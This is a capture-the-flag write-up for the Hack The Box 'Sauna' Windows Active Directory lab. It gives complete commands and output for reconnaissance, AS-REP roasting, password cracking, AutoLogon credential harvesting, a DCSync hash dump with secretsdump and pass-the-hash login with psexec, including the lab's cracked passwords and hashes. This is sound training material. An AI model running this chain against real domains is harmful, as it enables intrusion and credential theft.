Quick Summary
β A fun box machine running on Windows with great Active directory on it! The website running on port 80 has given some usernames on abous-us page. I do brute force web directories like I always did on website enumeration but I didnβt find anything. Running enum4linux I find some useful information that will probably help me to get in. Using GetNPUsers Iβve managed to dump user password hash and I crack it with john and grab the user.txt. In privilege escalation part, I use WinPEAS to get find interesting stuffs like credentials or misconfiguration, and I found a autoLogon credentials. To get the root, the machine is vulnerable to DcSync attack, I get the admin hash with secretsdump and with psexec I login as administrator and finally grab the root.txt.
Penetration Testing Methodologies
Network Scanning
β Nmap scan
β discover open ports and what services are running
Enumeration
β visiting the Website looking for possible hint
β found some possible users on about-us page
Post - Exploitation
β brute force web directories with dirsearch
β enumerate windows box with enum4linux to get some juicy information
β list all the users in a text file with name variation
Exploitation
β check if the Kerberos pre-authentication required is not set and doing a asreproast attack
β using GetNPUSers iβve manage to dump the user password hash with his username in it.
β crack the password hash with john
β Login as FSmith with evil-winrm and grab user.txt
Privilege Escalation
β upload WinPEAS and run to find some juicy info that I can use for privile escalation
β I found another credentials that is AutoLogon
β login again as svc_loanmgr user using evil-winrm
β svc_loanmgr has permission on GetchangesAll so we can perform DcSync Attack
β grab administrator password hash with secretsdump
β Login as administrator again using psexec and finally grab the root.txt
Network Scanning
Walkthrough
β I always begin at NMAP to look on the services what is running. I always use
- -sV β Probe open ports to determine service/version info
- -sC β equivalent to βscript=default
- -A- β Agressive scan
- -oN β to save our scan results to a text file
root in htb/boxes/Sauna
β― nmap -sV -sC -T4 -A 10.10.10.175 -oN nmap-Sauna
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 07:17 PST
Nmap scan report for 10.10.10.175
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-21 06:21:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/21%Time=5E754F50%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h02m24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-21T06:23:55
|_ start_date: N/A
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 211.01 ms 10.10.14.1
2 50.45 ms 10.10.10.175
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 395.18 seconds
root in htb/boxes/Sauna took 6m35s
β―
|
Nmap results
So thereβs a lot of port open. only 3 ports are interesting
- 80 β which basically a web service
- 88 β which running on Kerberos
- 5985 β WinRM
Enumeration
The Sauna Website
Since thereβs web service I always looking that first
In the website I found a possible list of users in about-us page
Post - Exploitation
Enumerationg USERS
I didnβt find anything in the whole website so I decided to brute force the web directories like I always do in web attacking :
root in htb/boxes/Sauna
β― python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.175/" -e asd -t 20 --simple-report=sauna-directories
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109
Error Log: /opt/dirsearch/logs/errors-20-03-21_07-40-57.log
Target: http://10.10.10.175/
[07:40:59] Starting:
[07:41:00] 403 - 312B - /%2e%2e/google.com
[07:41:52] 301 - 147B - /css -> http://10.10.10.175/css/
[07:42:08] 301 - 149B - /fonts -> http://10.10.10.175/fonts/
[07:42:18] 301 - 150B - /images -> http://10.10.10.175/images/
[07:42:18] 301 - 150B - /Images -> http://10.10.10.175/Images/
[07:42:19] 200 - 32KB - /index.html
Task Completed
root in htb/boxes/Sauna took 2m15s
β―
|
Didnβt find anything again so I use enum4linux to find some juicy information in the box :
root in htb/boxes/Sauna
β― enum4linux 10.10.10.175
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 21 08:02:10 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.175
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.10.175 |
====================================================
[E] Can't find workgroup/domain
============================================
| Nbtstat Information for 10.10.10.175 |
============================================
Looking up status of 10.10.10.175
No reply from 10.10.10.175
=====================================
| Session Check on 10.10.10.175 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.175 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
===========================================
| Getting domain SID for 10.10.10.175 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
[+] Host is part of a domain (not a workgroup)
======================================
| OS information on 10.10.10.175 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.175 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.175 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=============================
| Users on 10.10.10.175 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=========================================
| Share Enumeration on 10.10.10.175 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.175
====================================================
| Password Policy Information for 10.10.10.175 |
====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.10.175 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.175)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[E] Failed to get password policy with rpcclient
==============================
| Groups on 10.10.10.175 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 10.10.10.175 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.
=============================================
| Getting printer info for 10.10.10.175 |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Mar 21 08:03:39 2020
root in htb/boxes/Sauna took 1m29s
β―
|
base on the data I got, the machine is running on kerberos and the domain name is EGOTISTICALBANK
I listed all the users that on the about-us page in the website with different name variation :
Fergus.Smith
Fergus.a.Smith
FSmith
fsmith
FaSmith
FeSmith
FeaSmith
Hugo.Bear
Hugo.a.Bear
HBear
HaBear
HuBear
HuaBear
Steven.Kerb
Steven.a.Kerb
SKerb
SaKerb
StKerb
StaKerb
Shaun.Coins
Shaun.a.Coins
SCoins
SaCoins
ShCoins
ShaCoins
Bowie.Taylor
Bowie.a.Taylor
BTaylor
BaTaylor
BoTaylor
BoaTaylor
Sophie.Driver
Sophie.a.Driver
SDriver
SaDriver
SoDriver
SoaDriver
|
Exploitation
Kerberos Pre-Authentication
Now that I have users list my next thing to do is to check if the Kerberos pre-authentication required is not set, and do the asreproast attack
I will grab the AS_REP with GetNpUser.py :
root in htb/boxes/Sauna via π v2.7.17
β― python GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -outputfile result.txt -dc-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
root in htb/boxes/Sauna via π v2.7.17 took 24s
β― ls
GetNPUsers.py nmap-Sauna payaso.py result.txt sauna-directories users.txt
|
Now looking at the result I found that user FSmit is vulnerable to ASREProast and I get his password hash :
root in htb/boxes/Sauna via π v2.7.17
β― cat result.txt
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:8495bdf34711fd79334bb5c80d64fb42$8f7bb2cbd1b7d6010e44b7bd27aa1779beb2bddaffcbbcb395cf8d63b3d94e73028f1f99337ee7279c1feb3f3d89ab816db9be7f60ea7b7c3dd9cd1d71bde16939feb9bd17c72b338abcacf74757de1eb64c042d7d935e3b58244c5e2b916c82e524fb978146a6f6d8a6500125eff93a540568a0d14a70fb0af654820c6ba6819c805637928dfca73778281b012c94ac5dc0efce1b917d4cd9f2dfc2d5997d56e969f7eb44e48fcca182976dfca86784c7a655a847b53cd5d7053c1db06424c2bc2fb3c8c4ebcd012baa2b0e32c5a2a31436d960f390af34db74148a9e40f8dae3ae2be7c98ad547b8403756e61827ba7b98c9fa8c521f4ae50b053da135bcc8
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:fa1c6693421661b8cf10a966cf45ff47$7e2d1bbe52f0798842ecb2a2ed2c0c66d00c3202b79ae4982d860a6d3d00e35cd2fd2ef80c4c9172f494d0978f9d67361e37755a7e762a29b4b7f31165059b360c6b55db0a82ea7ee34ab193a2de0b08a18b77a51d446af15bfbead9ea25c9f291bf347bb0db34279a795615967fa79a2d74e5593f0c6ee4eaa27cc0b7736d15ec7ba61461645f666329e4bf01364d1966a7ff8b941b781bf4d40c0cee65187e2efd54ce99543029459a6587d091c160f06a7e95459b4f59687ef96959ae2d27f7181683bbf1b52fb329c7267d8cc198e5bca02c7ea8171b11e71fec9d85996e4bd5118e0e76ebe61823941c29dc75b3d03da0352b5bd68dc00b0e40b43ee0d7
root in htb/boxes/Sauna via π v2.7.17
β―
|
Now that I have the hash itβs time to crack it with john
root in htb/boxes/Sauna via π v2.7.17
β― john result.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
2g 0:00:00:58 DONE (2020-03-21 08:43) 0.03437g/s 181144p/s 362289c/s 362289C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root in htb/boxes/Sauna via π v2.7.17 took 59s
β―
|
Grab user.txt
I got the user password Thestrokes23 now itβs time use evil-winrm and login as FSmith and grab the user.txt
root in evil-winrm on ξ master via π v2.5.7
β― ruby evil-winrm.rb -i 10.10.10.175 -u FSmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> more user.txt
20b98d97
*Evil-WinRM* PS C:\Users\FSmith\Desktop>
|
Privilege Escalation
Escalating to svc_loanmgr
upon enumerating the box thereβs another user svc_loanmgr
*Evil-WinRM* PS C:\users> ls
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr
|
I need to get the user svc_loanmgr but I donβt know what to do next so I decided to run WinPEAS. After running I got his AutoLogon credentials in plain text :
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
|
so the password is Moneymakestheworldgoround!
We can also get his password with this command reg query HKLM /f password /t REG_SZ /s
*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query HKLM /f password /t REG_SZ /s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{29EA1611-529B-4113-8EE3-EE0F6DD2C715}
(Default) REG_SZ RASGCW Change Password Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{3bfe6eb7-281d-4333-999e-e949e3621de7}
(Default) REG_SZ Cert Password UI Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{9cb233a5-a4a5-46b9-ab13-db07ce949410}
(Default) REG_SZ Password retry UI Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{d9162b5b-ca81-476e-a310-cb32d932733c}
(Default) REG_SZ Password Expired UI Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultPassword REG_SZ Moneymakestheworldgoround!
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
FilterIn REG_SZ FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a}
(Default) REG_SZ PicturePasswordLogonProvider
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{60b78e88-ead8-445c-9cfd-0b87f74ea6cd}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
Text REG_SZ Prompt for user name and password
|
Login as svc_loanmanager
So from user FSmith now I will logged in as svc_loanmanager and start enumerating again.
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_loanmgr>
|
No interesting stuffs found. I decided to use BloodHound to get the structure of all domains :
I just found that user svc_loanmgr has permissions to execute DCSync against the DC
So I can abuse this privileges using secretdumps and extract the hash of the Administrator password :
root in impacket/examples on ξ master via π v2.7.17
β― python secretsdump.py EGOTISTICALBANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:97d33cc179ece045b9dd8f8ecd61a944:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:c9d865558b9ce09f6589ed79a4f9354c128b168f5b1dfa5712cce47a741e7df2
SAUNA$:aes128-cts-hmac-sha1-96:72c6fee92ba584acb19a4a1d7d2e876c
SAUNA$:des-cbc-md5:da0794d52c5eab5e
[*] Cleaning up...
root in impacket/examples on ξ master via π v2.7.17 took 51s
β―
|
Now that I got the administrator password hash, we can use psexec to login as administrator :
root in impacket/examples on ξ master via π v2.7.17
β― python psexec.py EGOTISTICALBANK/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff -target-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file GWcAFdKS.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service iwyN on 10.10.10.175.....
[*] Starting service iwyN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami & hostname
nt authority\system
SAUNA
C:\Windows\system32>
|
Grab the root.txt
Now that Iβm the admin i can now get the root.txt
C:\Windows\system32>cd \Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
01/23/2020 04:11 PM <DIR> .
01/23/2020 04:11 PM <DIR> ..
01/23/2020 11:22 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 7,681,822,720 bytes free
C:\Users\Administrator\Desktop>more root.txt
04965c68
C:\Users\Administrator\Desktop>
|
If you liked my writeup please leave a respect on my Profile
Referrences:
ASREProast
GetNPUsers
BloodHound
WinPEAS
secretsdumps